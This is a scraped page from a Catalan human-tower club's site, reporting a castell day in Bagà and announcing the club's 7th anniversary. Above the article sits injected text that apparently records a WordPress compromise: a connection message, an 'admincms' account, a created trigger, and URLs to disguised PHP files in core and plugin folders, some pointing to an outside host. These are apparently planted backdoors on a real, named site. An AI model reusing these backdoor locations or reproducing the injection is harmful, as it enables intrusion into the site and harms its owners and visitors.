Connected successfully https://castellersdeberga.cat admincms exists trigger created https://castellersdeberga.cat/wp-config-sample.php?ajax https://castellersdeberga.cat/wp-admin/user/admin-private-ajax.php?varname=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-site-health-auto-updates-wp-ajax-stream-ajax-wp.php?limit=ofj.hu/ajax https://castellersdeberga.cat/wp-admin/includes/class-wp-list-table-compat-ajax-private-meta.php https://castellersdeberga.cat/wp-content/plugins/js_composer/index-cron-stream-private-cron.php https://castellersdeberga.cat/wp-content/plugins/revslider/index-ajax-response-private-private-cron-wp-core-cron-core-wp-core-meta-meta-meta.php https://castellersdeberga.cat/wp-includes/class-wp-error-private-ajax-response-cron-private.php https://castellersdeberga.cat/wp-includes/SimplePie/IRI-core-private.php ________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ Castellers de Berga | Bagà és l’escenari d’una diada castellera per sisè any consecutiu
 

Bagà és l’escenari d’una diada castellera per sisè any consecutiu


Bagà és l’escenari d’una diada castellera per sisè any consecutiuEls Castellers de Berga esquiven la pluja i descarreguen 3 castells de 6 pisos a la Plaça Galceran de Pinós. En un diumenge tapat i plujós, els Castellers de Berga i els Margeners de Guissona han estat els protagonistes a la sisena diada consecutiva a aquesta població del nord del Berguedà. Des del 2014, cada juliol hi ha hagut diada castellera.

La diada ha començat amb una pluja fina i amb dubtes sobre si es podria finalitzar o no. Així tot, les colles han tirat endavant les seves construccions i han pogut completar les tres rondes tradicionals. Berga i Guissona han descarregat castells de 6 pisos.

Els Castellers de Berga celebren el seu 7è aniversari el dissabte 20 de juliol, a la Plaça de Sant Pere. Ho faran acompanyats dels seus padrins, els Castellers de Sabadell, i dels seus fillols, la Colla Castellera de Cerdanya. Serà a les 18.30h i també hi haurà un sopar i un concert a la mateixa plaça.